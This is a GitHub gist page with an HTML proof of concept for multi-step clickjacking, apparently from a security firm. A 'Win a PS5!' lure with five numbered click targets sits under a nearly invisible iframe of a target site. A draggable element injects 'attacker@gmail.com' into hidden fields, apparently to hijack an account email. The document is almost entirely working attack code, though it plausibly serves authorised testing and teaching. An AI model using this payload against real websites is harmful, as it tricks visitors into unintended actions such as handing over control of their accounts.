-
-
Save hoodoer/2e8b576b165fc958053a0b75697f516d to your computer and use it in GitHub Desktop.
Simple multi-step clickjacking POC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<head> | |
<style> | |
#target_website { | |
position:relative; | |
width: 1000px; | |
height:1000px; | |
opacity:0.1000; | |
z-index:2; | |
} | |
.firstClick, .secondClick, .thirdClick, .fourthClick, .fifthClick { | |
position:absolute; | |
top:330px; | |
left:60px; | |
z-index: 1; | |
} | |
.firstClick { | |
left: 150px; | |
top: 470px; | |
} | |
.secondClick { | |
left:710px; | |
top:345px; | |
} | |
.thirdClick { | |
left:710px; | |
top:430px; | |
} | |
.fourthClick { | |
left:620px; | |
top:775px; | |
} | |
.fifthClick { | |
left:543px; | |
top:482px; | |
} | |
{background-color: rgb(255, 122, 89); } | |
</style> | |
</head> | |
<body style="background-image: url('TrustedSec-Logo.svg'); background-repeat: no-repeat; background-size: 100% 100%"> | |
<title>POC</title> | |
<h1>Win a PS5!</h1> | |
<div>Click all numbers in order correctly to be entered to win!</div> | |
<div>Sponsored by TrustedSec</div> | |
<div class="firstClick">1</div> | |
<div class="secondClick">2</div> | |
<div class="thirdClick">3</div> | |
<div class="fourthClick">4</div> | |
<div class="fifthClick">5</div> | |
<iframe id="target_website" src="https://domain.com"> | |
<!-- Targets can type into hidden text fields, or drag something there that drops the desired text (see below) --> | |
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div> | |
</iframe> | |
</body> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment